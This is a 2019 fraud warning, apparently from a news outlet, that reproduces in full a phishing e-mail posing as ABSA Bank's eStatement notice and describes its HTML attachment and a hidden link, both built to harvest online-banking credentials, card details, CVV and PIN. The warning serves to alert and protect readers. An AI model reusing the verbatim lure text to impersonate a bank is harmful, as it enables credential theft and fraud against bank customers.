ABSA bank - fraudulent e-mail, dangerous payload
Publication:
FCRO Subsection:
Tuesday, 16 July, 2019 - 03:06
A very convincing e-mail is being distributed. It falsely claims to be from South Africa's ABSA Bank and, so far as this newspaper can tell, is distributed to a spam-list that was first produced by or for the use of a training company since when it has gone into the wild, so to speak. It does not discriminate geographically. It contains an attachment (Credit Card Statement.htm). The full e-mail is below.
******* body of e-mail, HTML stripped *********
Dear Customer
Please find attached your electronic statement.
Additional verifications have been added to your eStatement to help curb and prevent online fraud. Information only known to you will be displayed on the statement to confirm that the statement is sent by Absa. Your financial security is our main concern.
A mobile account summary PDF of your eStatement is also attached to this email to allow you to view it on your mobile device.
The Striata reader now supports both iPad and iPhone devices and allows users to open encrypted eStatements on these devices. Please search for Striata reader in the Apple AppStrore.
Kindly advise us of any changes to your email address to ensure that you always receive your electronic statement.
For more information, contact officialemail@absa.co.za or the call centre on 0860 111 123.
Yours sincerely
Digital Channels and Payments
eStatement verification
Installing the Striata Reader
1. Connect to the internet.
2. Download the Reader from the Striata Website (58Kb): Go to striata.com/download and click on 'Download Striata Reader'.
3. Select 'Open/Run'. If no 'Open/Run' option is given, select 'Save' and then 'Open'.
4. The Reader is now installed. Select 'Ok' to close the 'install confirmation' dialogue box.
5. Double-click on the encrypted attachment. You will be prompted to type in a password.
Installing Adobe Reader
To open your statement, you need to have Adobe Reader v 5.0 or higher. If you do not have Adobe Reader, go to get.adobe.com/reader to download the latest version.
Absa Bank Ltd Reg No 1986/004794/06 Authorised Financial Services Provider Registered Credit Provider NCRCP7
Important restrictions, qualifications and disclaimers (-the Disclaimer-) apply to this e-mail. A 'disclaimer' means we do not accept responsibility or we limit our responsibility for something related to this e-mail. To read this, copy the following address to your internet browser: absa.co.za/disclaimer. The Disclaimer forms part of the content of this e-mail in terms of section 11 of the Electronic Communications and Transactions Act, 25 of 2002. If you are unable to access the Disclaimer, send a blank e-mail to disclaimer@absa.co.za and we will send you a copy of the Disclaimer
Important Notice: Absa is an Authorised Financial Services Provider and Registered Credit Provider, registration number: NCRCP7. This e-mail and any files transmitted with it may contain information that is confidential, privileged or otherwise protected from disclosure. If you are not an intended recipient of this e-mail, do not duplicate or redistribute it by any means. Please delete it and any attachments and notify the sender that you have received it in error. Unless specifically indicated, this e-mail is not an offer to buy or sell or a solicitation to buy or sell any securities, investment products or other financial product or service, an official confirmation of any transaction, or an official statement of Absa. Any views or opinions presented are solely those of the author and do not necessarily represent those of Absa. This e-mail is subject to terms available at the following link: http://www.absa.co.za/disclaimer. The Disclaimer forms part of the content of this email. If you are unable to access the Disclaimer, send a blank e-mail to disclaimer@absa.co.za and we will send you a copy of the Disclaimer. By messaging with Absa you consent to the foregoing. By emailing Absa you consent to the terms herein. This email may relate to or be sent from other members of the Absa Group.
*************************
Buried in the mail, hidden in the plain text version, is a link to a page at ezer.or.kr where in a directory several levels down there is a form called "login.php" and which contains a submit button, indicating that this is likely to be the place where information is collected, possibly without the knowledge of the owner of that site.
*********************
The attachment, Credit Card Statement.htm, creates a convincing copy of a page from the ABSA website on the victim's local machine. It runs Javascript which is capable of executing actions without the victim being aware of what it is doing. Of itself, Javascript is safe but some criminals use it for nefarious purposes.
The page is designed to collect online banking credentials including the customer's self-selected registration number and the related PIN, credit card numbers, expiry date and CVV as well as a PIN.
